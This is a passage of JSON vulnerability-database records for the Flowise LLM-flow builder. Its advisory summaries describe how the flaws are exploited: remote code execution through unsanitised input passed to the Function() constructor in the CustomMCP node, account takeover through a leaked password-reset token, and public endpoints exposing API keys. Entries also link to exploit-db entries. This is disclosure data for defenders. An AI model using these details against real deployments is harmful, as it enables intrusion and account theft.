"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:43:03Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f6hc-c5jr-878p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41276", "GHSA-f6hc-c5jr-878p" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w9yr-5jbp-q7fm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/100689?format=api", "vulnerability_id": "VCID-wt2v-e5sa-n3g8", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59528", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.85265", "scoring_system": "epss", "scoring_elements": "0.99379", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-59528" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59528", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59528" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132", "reference_id": "CustomMCP.ts#L132", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220", "reference_id": "CustomMCP.ts#L220", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270", "reference_id": "CustomMCP.ts#L262-L270", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52440.py", "reference_id": "CVE-2025-59528", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52440.py" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6", "reference_id": "flowise%403.0.6", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6" }, { "reference_url": "https://github.com/advisories/GHSA-3gcm-f6qx-ff7p", "reference_id": "GHSA-3gcm-f6qx-ff7p", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-3gcm-f6qx-ff7p" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p", "reference_id": "GHSA-3gcm-f6qx-ff7p", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5", "reference_id": "index.ts#L5", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78", "reference_id": "index.ts#L57-L78", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94", "reference_id": "index.ts#L91-L94", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-22T20:23:40Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "CVE-2025-59528", "GHSA-3gcm-f6qx-ff7p" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wt2v-e5sa-n3g8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212351?format=api", "vulnerability_id": "VCID-ywgu-76cy-uqe7", "summary": "Flowise Fails to Invalidate Existing Sessions After Password Changes", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5294", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/5294" }, { "reference_url": "https://github.com/advisories/GHSA-x7rp-qj2h-ghgw", "reference_id": "GHSA-x7rp-qj2h-ghgw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x7rp-qj2h-ghgw" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x7rp-qj2h-ghgw", "reference_id": "GHSA-x7rp-qj2h-ghgw", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x7rp-qj2h-ghgw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35238?format=api", "purl": "pkg:npm/flowise@3.0.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.10" } ], "aliases": [ "GHSA-x7rp-qj2h-ghgw" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ywgu-76cy-uqe7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94179?format=api", "vulnerability_id": "VCID-zbrd-qdty-2bfs", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58434", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.32362", "scoring_system": "epss", "scoring_elements": "0.96958", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-58434" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863", "reference_id": "9e178d68873eb876073846433a596590d3d9c863", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-12T18:10:37Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/typescript/webapps/52557.py", "reference_id": "CVE-2025-58434", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/typescript/webapps/52557.py" }, { "reference_url": "https://github.com/advisories/GHSA-wgpv-6j63-x5ph", "reference_id": "GHSA-wgpv-6j63-x5ph", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-wgpv-6j63-x5ph" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph", "reference_id": "GHSA-wgpv-6j63-x5ph", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-09-12T18:10:37Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "CVE-2025-58434", "GHSA-wgpv-6j63-x5ph" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zbrd-qdty-2bfs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80707?format=api", "vulnerability_id": "VCID-zwna-stj5-3yhm", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GET /api/v1/public-chatflows/:id endpoint returns the full chatflow object without sanitization for public chatflows. Docker validation revealed this is worse than initially assessed: the sanitizeFlowDataForPublicEndpoint function does NOT exist in the released v3.0.13 Docker image. Both public-chatflows AND public-chatbotConfig return completely raw flowData including credential IDs, plaintext API keys, and password-type fields. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41278", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10461", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41278" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41278", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41278" }, { "reference_url": "https://github.com/advisories/GHSA-w47f-j8rh-wx87", "reference_id": "GHSA-w47f-j8rh-wx87", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w47f-j8rh-wx87" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w47f-j8rh-wx87", "reference_id": "GHSA-w47f-j8rh-wx87", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:39:44Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w47f-j8rh-wx87" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41278", "GHSA-w47f-j8rh-wx87" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zwna-stj5-3yhm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212281?format=api", "vulnerability_id": "VCID-zwz7-byj4-6qan", "summary": "Flowise vulnerable to XSS", "references": [ { "reference_url": "https://github.com/advisories/GHSA-4fr9-3x69-36wv", "reference_id": "GHSA-4fr9-3x69-36wv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4fr9-3x69-36wv" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4fr9-3x69-36wv", "reference_id": "GHSA-4fr9-3x69-36wv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4fr9-3x69-36wv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34082?format=api", "purl": "pkg:npm/flowise@3.0.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": 